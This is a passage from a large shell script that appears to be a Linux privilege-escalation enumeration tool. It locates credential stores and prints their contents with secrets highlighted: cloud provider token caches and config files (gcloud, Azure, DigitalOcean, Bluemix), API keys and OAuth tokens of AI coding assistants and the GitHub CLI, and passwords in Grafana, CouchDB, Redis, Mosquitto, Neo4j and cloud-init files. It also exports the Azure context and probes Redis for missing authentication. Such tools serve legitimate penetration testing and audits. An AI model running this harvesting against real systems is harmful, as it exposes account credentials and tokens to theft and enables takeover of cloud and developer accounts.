  10359     if ! [ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ovpn"; fi; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo "";
  10360 fi
  10361 
  10362 
  10363 if [ "$PSTORAGE_CLOUD_CREDENTIALS" ] || [ "$DEBUG" ]; then
  10364   print_2title "Analyzing Cloud Credentials Files (limit 70)"
  10365     (pwsh -Command "Save-AzContext -Path /tmp/az-context3489ht.json" && cat /tmp/az-context3489ht.json && rm /tmp/az-context3489ht.json) || echo_not_found "pwsh"
  10366     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10367     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "legacy_credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10368     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"adc\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "adc.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "adc\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,adc\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10369     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.boto$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".boto"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.boto$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.boto$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10370     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.credentials\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".credentials.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.credentials\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.credentials\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10371     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"firebase-tools\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "firebase-tools.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "firebase-tools\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,firebase-tools\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,id_token.*|access_token.*|refresh_token.*,${SED_RED},g"; done; echo "";
  10372     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10373     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10374     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"accessTokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "accessTokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "accessTokens\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10375     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"gcloud$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gcloud"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "gcloud$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,gcloud$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "b'authorization'.*" | sed -${E} "s,b'authorization'.*,${SED_RED},g"; done; echo "";done; echo "";
  10376     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "legacy_credentials"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,legacy_credentials$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,refresh_token.*|client_secret,${SED_RED},g"; done; echo "";done; echo "";
  10377     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"azureProfile\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "azureProfile.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "azureProfile\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10378     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "TokenCache.dat"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10379     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AzureRMContext.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,Id.*|Credential.*,${SED_RED},g"; done; echo "";
  10380     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"clouds\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "clouds.config"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "clouds\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,clouds\.config$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  10381     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"service_principal_entries\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "service_principal_entries.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "service_principal_entries\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,service_principal_entries\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10382     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"msal_token_cache\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "msal_token_cache.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "msal_token_cache\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,msal_token_cache\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10383     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"msal_http_cache\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "msal_http_cache.bin"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "msal_http_cache\.bin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,msal_http_cache\.bin$,${SED_RED},"; done; echo "";
  10384     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"service_principal_entries\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "service_principal_entries.bin"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "service_principal_entries\.bin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,service_principal_entries\.bin$,${SED_RED},"; done; echo "";
  10385     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"msal_token_cache\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "msal_token_cache.bin"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "msal_token_cache\.bin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,msal_token_cache\.bin$,${SED_RED},"; done; echo "";
  10386     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"ErrorRecords$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ErrorRecords"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "ErrorRecords$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ErrorRecords$,${SED_RED},"; done; echo "";
  10387     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "TokenCache.dat"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10388     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bluemix"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.bluemix$,${SED_RED},"; find "$f" -name "config.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";
  10389     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"doctl$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "doctl"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "doctl$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,doctl$,${SED_RED},"; find "$f" -name "config.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "access-token.*" | sed -${E} "s,access-token.*,${SED_RED},g"; done; echo "";done; echo "";
  10390     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"Google Cloud Directory Sync$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Google Cloud Directory Sync"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "Google Cloud Directory Sync$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Google Cloud Directory Sync$,${SED_RED},"; find "$f" -name "*.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,oAuth2RefreshToken.*|authCredentialsEncrypted.*,${SED_RED},g"; done; echo "";done; echo "";
  10391     if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"Google Password Sync$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Google Password Sync"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "Google Password Sync$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Google Password Sync$,${SED_RED},"; find "$f" -name "*.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,baseDN.*|authorizeUsername.*,${SED_RED},g"; done; echo "";done; echo "";
  10392 fi
  10393 
  10394 
  10395 if [ "$PSTORAGE_AI_CODING_ASSISTANTS" ] || [ "$DEBUG" ]; then
  10396   print_2title "Analyzing AI Coding Assistants Files (limit 70)"
  10397     if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.codex$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".codex"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.codex$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.codex$,${SED_RED},"; find "$f" -name "auth.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,auth.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,access_token|refresh_token|id_token|OPENAI_API_KEY|api_key|auth_mode,${SED_RED},g"; done; echo "";find "$f" -name "config.toml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.toml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,OPENAI_API_KEY|api_key|auth_mode|model|profile,${SED_RED},g"; done; echo "";done; echo "";
  10398     if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.claude$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".claude"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.claude$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.claude$,${SED_RED},"; find "$f" -name "settings.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,apiKeyHelper|ANTHROPIC_API_KEY|ANTHROPIC_AUTH_TOKEN|Authorization|Bearer|token|secret|mcpServers,${SED_RED},g"; done; echo "";find "$f" -name "settings.local.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.local.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,apiKeyHelper|ANTHROPIC_API_KEY|ANTHROPIC_AUTH_TOKEN|Authorization|Bearer|token|secret|mcpServers,${SED_RED},g"; done; echo "";done; echo "";
  10399     if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.claude\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".claude.json"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.claude\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.claude\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,auth|token|bearer|session|oauth|api[_-]?key,${SED_RED},g"; done; echo "";
  10400     if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.gemini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".gemini"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.gemini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gemini$,${SED_RED},"; find "$f" -name "settings.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,GEMINI_API_KEY|GOOGLE_API_KEY|access_token|refresh_token|oauth|client_secret|Authorization|Bearer|headers|mcpServers,${SED_RED},g"; done; echo "";find "$f" -name "oauth_creds.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,oauth_creds.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,access_token|refresh_token|id_token|token_type|scope|client_id,${SED_RED},g"; done; echo "";done; echo "";
  10401     if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.cursor$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".cursor"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.cursor$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.cursor$,${SED_RED},"; find "$f" -name "mcp.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,mcp.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,Authorization|Bearer|token|api[_-]?key|secret|headers|env,${SED_RED},g"; done; echo "";done; echo "";
  10402     if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.mcp\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".mcp.json"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.mcp\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.mcp\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,Authorization|Bearer|token|api[_-]?key|secret|headers|env,${SED_RED},g"; done; echo "";
  10403     if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"gh$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gh"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "gh$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,gh$,${SED_RED},"; find "$f" -name "hosts.yml" | while read ff; do ls -ld "$ff" | sed -${E} "s,hosts.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,oauth_token|user:|oauth,${SED_RED},g"; done; echo "";done; echo "";
  10404     if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"state\.vscdb$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "state.vscdb"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "state\.vscdb$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,state\.vscdb$,${SED_RED},"; done; echo "";
  10405     if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"state\.vscdb\.backup$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "state.vscdb.backup"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "state\.vscdb\.backup$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,state\.vscdb\.backup$,${SED_RED},"; done; echo "";
  10406     if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"storage\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "storage.json"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "storage\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,storage\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,github\.copilot|copilot|cursor|openai|anthropic|gemini|token|auth,${SED_RED},g"; done; echo "";
  10407 fi
  10408 
  10409 
  10410 if [ "$PSTORAGE_ROAD_RECON" ] || [ "$DEBUG" ]; then
  10411   print_2title "Analyzing Road Recon Files (limit 70)"
  10412     if ! [ "`echo \"$PSTORAGE_ROAD_RECON\" | grep -E \"\.roadtools_auth$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".roadtools_auth"; fi; fi; printf "%s" "$PSTORAGE_ROAD_RECON" | grep -E "\.roadtools_auth$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.roadtools_auth$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,accessToken.*,${SED_RED},g"; done; echo "";
  10413 fi
  10414 
  10415 
  10416 if [ "$PSTORAGE_KIBANA" ] || [ "$DEBUG" ]; then
  10417   print_2title "Analyzing Kibana Files (limit 70)"
  10418     if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kibana.y*ml"; fi; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo "";
  10419 fi
  10420 
  10421 
  10422 if [ "$PSTORAGE_GRAFANA" ] || [ "$DEBUG" ]; then
  10423   print_2title "Analyzing Grafana Files (limit 70)"
  10424     if ! [ "`echo \"$PSTORAGE_GRAFANA\" | grep -E \"grafana\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "grafana.ini"; fi; fi; printf "%s" "$PSTORAGE_GRAFANA" | grep -E "grafana\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,grafana\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#|^;" | sed -${E} "s,admin.*|username.*|password:*|secret.*,${SED_RED},g"; done; echo "";
  10425 fi
  10426 
  10427 
  10428 if [ "$PSTORAGE_KNOCKD" ] || [ "$DEBUG" ]; then
  10429   print_2title "Analyzing Knockd Files (limit 70)"
  10430     if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*knockd*"; fi; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  10431 fi
  10432 
  10433 
  10434 if [ "$PSTORAGE_ELASTICSEARCH" ] || [ "$DEBUG" ]; then
  10435   print_2title "Analyzing Elasticsearch Files (limit 70)"
  10436     echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)"
  10437     if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "elasticsearch.y*ml"; fi; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo "";
  10438 fi
  10439 
  10440 
  10441 if [ "$PSTORAGE_COUCHDB" ] || [ "$DEBUG" ]; then
  10442   print_2title "Analyzing CouchDB Files (limit 70)"
  10443     if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "couchdb"; fi; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,couchdb$,${SED_RED},"; find "$f" -name "local.ini" | while read ff; do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo "";
  10444 fi
  10445 
  10446 
  10447 if [ "$PSTORAGE_REDIS" ] || [ "$DEBUG" ]; then
  10448   print_2title "Analyzing Redis Files (limit 70)"
  10449     ( redis-server --version || echo_not_found "redis-server") 2>/dev/null
  10450     redis_info="$(if [ "$TIMEOUT" ]; then $TIMEOUT 2 redis-cli INFO 2>/dev/null; else redis-cli INFO 2>/dev/null; fi)"; if [ "$redis_info" ] && ! echo "$redis_info" | grep -i NOAUTH; then echo "Redis isn't password protected" | sed -${E} "s,.*,${SED_RED},"; fi
  10451     if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "redis.conf"; fi; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*|rename-command.*|protected-mode.*no,${SED_RED},g"; done; echo "";
  10452 fi
  10453 
  10454 
  10455 if [ "$PSTORAGE_MOSQUITTO" ] || [ "$DEBUG" ]; then
  10456   print_2title "Analyzing Mosquitto Files (limit 70)"
  10457     if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mosquitto.conf"; fi; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo "";
  10458 fi
  10459 
  10460 
  10461 if [ "$PSTORAGE_NEO4J" ] || [ "$DEBUG" ]; then
  10462   print_2title "Analyzing Neo4j Files (limit 70)"
  10463     if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "neo4j"; fi; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,neo4j$,${SED_RED},"; find "$f" -name "auth" | while read ff; do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";
  10464 fi
  10465 
  10466 
  10467 if [ "$PSTORAGE_CLOUD_INIT" ] || [ "$DEBUG" ]; then
  10468   print_2title "Analyzing Cloud Init Files (limit 70)"
  10469     if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cloud.cfg"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo "";
  10470 fi
  10471 
  10472 
  10473 if [ "$PSTORAGE_ERLANG" ] || [ "$DEBUG" ]; then
  10474   print_2title "Analyzing Erlang Files (limit 70)"
